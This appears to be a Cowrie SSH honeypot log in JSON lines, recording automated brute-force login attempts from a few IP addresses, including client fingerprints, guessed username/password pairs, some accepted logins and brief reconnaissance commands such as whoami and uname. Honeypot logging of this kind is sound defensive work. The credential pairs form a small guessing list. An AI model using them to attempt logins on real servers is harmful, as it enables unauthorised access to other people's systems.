{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38646,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1dcc16edfa2","protocol":"ssh","message":"New connection: 212.227.235.229:38646 (1.2.3.4:22) [session: e1dcc16edfa2]","sensor":"my-vps","timestamp":"2025-08-31T00:36:12.376408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:36:12.377314Z","src_ip":"212.227.235.229","session":"e1dcc16edfa2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:36:12.679865Z","src_ip":"212.227.235.229","session":"e1dcc16edfa2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33974,"dst_ip":"1.2.3.4","dst_port":22,"session":"70f5ded7c860","protocol":"ssh","message":"New connection: 212.227.125.160:33974 (1.2.3.4:22) [session: 70f5ded7c860]","sensor":"my-vps","timestamp":"2025-08-31T00:36:12.705190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:36:12.706760Z","src_ip":"212.227.125.160","session":"70f5ded7c860"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:36:12.779912Z","src_ip":"212.227.125.160","session":"70f5ded7c860"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:36:12.939397Z","src_ip":"212.227.235.229","session":"77cb0e4928b1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:36:12.940058Z","src_ip":"212.227.235.229","session":"77cb0e4928b1"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-31T00:36:13.067555Z","src_ip":"212.227.125.160","session":"70f5ded7c860"}
{"eventid":"cowrie.login.failed","username":"linux","password":"linux123456","message":"login attempt [linux/linux123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:36:13.934721Z","src_ip":"212.227.235.229","session":"e1dcc16edfa2"}
{"eventid":"cowrie.login.success","username":"root","password":"g1br11l1","message":"login attempt [root/g1br11l1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:36:14.113874Z","src_ip":"212.227.125.160","session":"324b397fd2af"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:14.230962Z","src_ip":"212.227.125.160","session":"70f5ded7c860"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:15.240077Z","src_ip":"212.227.235.229","session":"e1dcc16edfa2"}
{"eventid":"cowrie.login.failed","username":"backup","password":"root123","message":"login attempt [backup/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:36:17.172513Z","src_ip":"212.227.235.229","session":"77cb0e4928b1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:36:18.515732Z","src_ip":"212.227.125.160","session":"324b397fd2af"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T00:36:18.516414Z","src_ip":"212.227.125.160","session":"324b397fd2af"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:19.186146Z","src_ip":"212.227.235.229","session":"77cb0e4928b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:19.676421Z","src_ip":"212.227.125.160","session":"324b397fd2af"}
{"eventid":"cowrie.session.closed","duration":"13.0","message":"Connection lost after 13.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:19.708808Z","src_ip":"212.227.125.160","session":"324b397fd2af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37536,"dst_ip":"1.2.3.4","dst_port":22,"session":"458debf2ac8c","protocol":"ssh","message":"New connection: 212.227.125.160:37536 (1.2.3.4:22) [session: 458debf2ac8c]","sensor":"my-vps","timestamp":"2025-08-31T00:36:23.086580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:36:23.087655Z","src_ip":"212.227.125.160","session":"458debf2ac8c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:36:23.161136Z","src_ip":"212.227.125.160","session":"458debf2ac8c"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-31T00:36:23.428677Z","src_ip":"212.227.125.160","session":"458debf2ac8c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:24.645681Z","src_ip":"212.227.125.160","session":"458debf2ac8c"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":35736,"dst_ip":"1.2.3.4","dst_port":22,"session":"2367171ad60d","protocol":"ssh","message":"New connection: 201.148.180.50:35736 (1.2.3.4:22) [session: 2367171ad60d]","sensor":"my-vps","timestamp":"2025-08-31T00:36:26.024219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:36:26.703229Z","src_ip":"201.148.180.50","session":"2367171ad60d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:36:26.703950Z","src_ip":"201.148.180.50","session":"2367171ad60d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43580,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce8df8e757bf","protocol":"ssh","message":"New connection: 212.227.125.160:43580 (1.2.3.4:22) [session: ce8df8e757bf]","sensor":"my-vps","timestamp":"2025-08-31T00:36:32.833543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:36:33.270167Z","src_ip":"212.227.125.160","session":"ce8df8e757bf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:36:33.270858Z","src_ip":"212.227.125.160","session":"ce8df8e757bf"}
{"eventid":"cowrie.login.success","username":"root","password":"g1br11l1","message":"login attempt [root/g1br11l1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:36:33.565817Z","src_ip":"201.148.180.50","session":"2367171ad60d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39926,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaba83d25299","protocol":"ssh","message":"New connection: 212.227.125.160:39926 (1.2.3.4:22) [session: aaba83d25299]","sensor":"my-vps","timestamp":"2025-08-31T00:36:33.631910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:36:33.632870Z","src_ip":"212.227.125.160","session":"aaba83d25299"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:36:33.706833Z","src_ip":"212.227.125.160","session":"aaba83d25299"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:36:33.931416Z","src_ip":"212.227.125.160","session":"aaba83d25299"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:35.091137Z","src_ip":"212.227.125.160","session":"aaba83d25299"}
{"eventid":"cowrie.login.failed","username":"backup","password":"root123","message":"login attempt [backup/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:36:35.641876Z","src_ip":"212.227.125.160","session":"ce8df8e757bf"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:37.312831Z","src_ip":"212.227.125.160","session":"ce8df8e757bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:36:43.176519Z","src_ip":"201.148.180.50","session":"2367171ad60d"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T00:36:43.177182Z","src_ip":"201.148.180.50","session":"2367171ad60d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36032,"dst_ip":"1.2.3.4","dst_port":22,"session":"beafcb8f32f8","protocol":"ssh","message":"New connection: 212.227.125.160:36032 (1.2.3.4:22) [session: beafcb8f32f8]","sensor":"my-vps","timestamp":"2025-08-31T00:36:44.001143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:36:44.001910Z","src_ip":"212.227.125.160","session":"beafcb8f32f8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:36:44.076564Z","src_ip":"212.227.125.160","session":"beafcb8f32f8"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:36:44.447301Z","src_ip":"212.227.125.160","session":"beafcb8f32f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:36:44.733188Z","src_ip":"212.227.125.160","session":"beafcb8f32f8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:36:44.733915Z","src_ip":"212.227.125.160","session":"beafcb8f32f8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:44.809677Z","src_ip":"212.227.125.160","session":"beafcb8f32f8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:44.810903Z","src_ip":"212.227.125.160","session":"beafcb8f32f8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:44.938220Z","src_ip":"201.148.180.50","session":"2367171ad60d"}
{"eventid":"cowrie.session.closed","duration":"18.9","message":"Connection lost after 18.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:44.939371Z","src_ip":"201.148.180.50","session":"2367171ad60d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42834,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa5508d0ef17","protocol":"ssh","message":"New connection: 212.227.125.160:42834 (1.2.3.4:22) [session: aa5508d0ef17]","sensor":"my-vps","timestamp":"2025-08-31T00:36:54.329834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:36:54.330503Z","src_ip":"212.227.125.160","session":"aa5508d0ef17"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:36:54.404080Z","src_ip":"212.227.125.160","session":"aa5508d0ef17"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-31T00:36:54.634265Z","src_ip":"212.227.125.160","session":"aa5508d0ef17"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:36:55.792993Z","src_ip":"212.227.125.160","session":"aa5508d0ef17"}
